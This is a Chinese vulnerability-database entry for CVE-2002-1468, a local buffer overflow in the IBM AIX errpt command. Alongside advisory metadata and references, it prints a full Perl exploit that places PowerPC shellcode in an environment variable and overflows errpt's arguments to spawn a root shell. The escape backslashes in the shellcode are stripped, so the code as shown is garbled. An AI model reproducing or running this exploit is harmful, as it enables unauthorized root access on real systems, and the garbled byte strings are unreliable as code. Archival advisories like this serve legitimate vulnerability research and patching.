IBM AIX ERRPT本地缓冲区溢出漏洞

IBM AIX ERRPT本地缓冲区溢出漏洞

漏洞ID 1107276 漏洞类型 缓冲区溢出
发布时间 2003-04-16 更新时间 2005-05-13
图片[1]-IBM AIX ERRPT本地缓冲区溢出漏洞-安全小百科CVE编号 CVE-2002-1468
图片[2]-IBM AIX ERRPT本地缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200304-131
漏洞平台 AIX CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21904
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200304-131
|漏洞详情
AIX4.3.3版本的errpt存在缓冲区溢出漏洞。本地用户以根权限执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/5885/info

The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges.

#!/usr/bin/perl
# FileName: x_errpt_aix5.pl
# Exploit command errpt for Aix5L to get a root shell.
# Tested  : on Aix5.1
# Author  : [email protected]
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-4-16
# Announce: use as your owner risk!

$BUFF="A". "x7cxa5x2ax79"x500;

#shellcode from lsd-pl and modified by watercloud 2003-4 for Aix5L
$BUFF.="x7ex94xa2x79x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb6x05xffxffx7ex94xa2x79";
$BUFF.="x7ex84xa3x78x40x82xffxfdx7exa8x02xa6x3axb5x01x40";
$BUFF.="x88x55xfexe0x7ex83xa3x78x3axd5xfexe4x7exc8x03xa6";
$BUFF.="x4cxc6x33x42x44xffxffx02xb7x05xffxffx38x75xffx04";
$BUFF.="x38x95xffx0cx7ex85xa3x78x90x75xffx0cx92x95xffx10";
$BUFF.="x88x55xfexe1x9ax95xffx0bx4bxffxffxd8/bin/sh";

%ENV=(); $ENV{CC}=$BUFF;

exec "/usr/bin/errpt","-T","A"."x2fxf2x2ax40"x1320;
#EOF
|参考资料

来源:AIXAPAR
名称:IY31997
链接:http://archives.neohapsis.com/archives/aix/2002-q3/0007.html
来源:BID
名称:5885
链接:http://www.securityfocus.com/bid/5885

相关推荐: Cobalt RaQ4 Administrative Interface Command Execution Vulnerability

Cobalt RaQ4 Administrative Interface Command Execution Vulnerability 漏洞ID 1101185 漏洞类型 Input Validation Error 发布时间 2002-12-05 更新时间…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享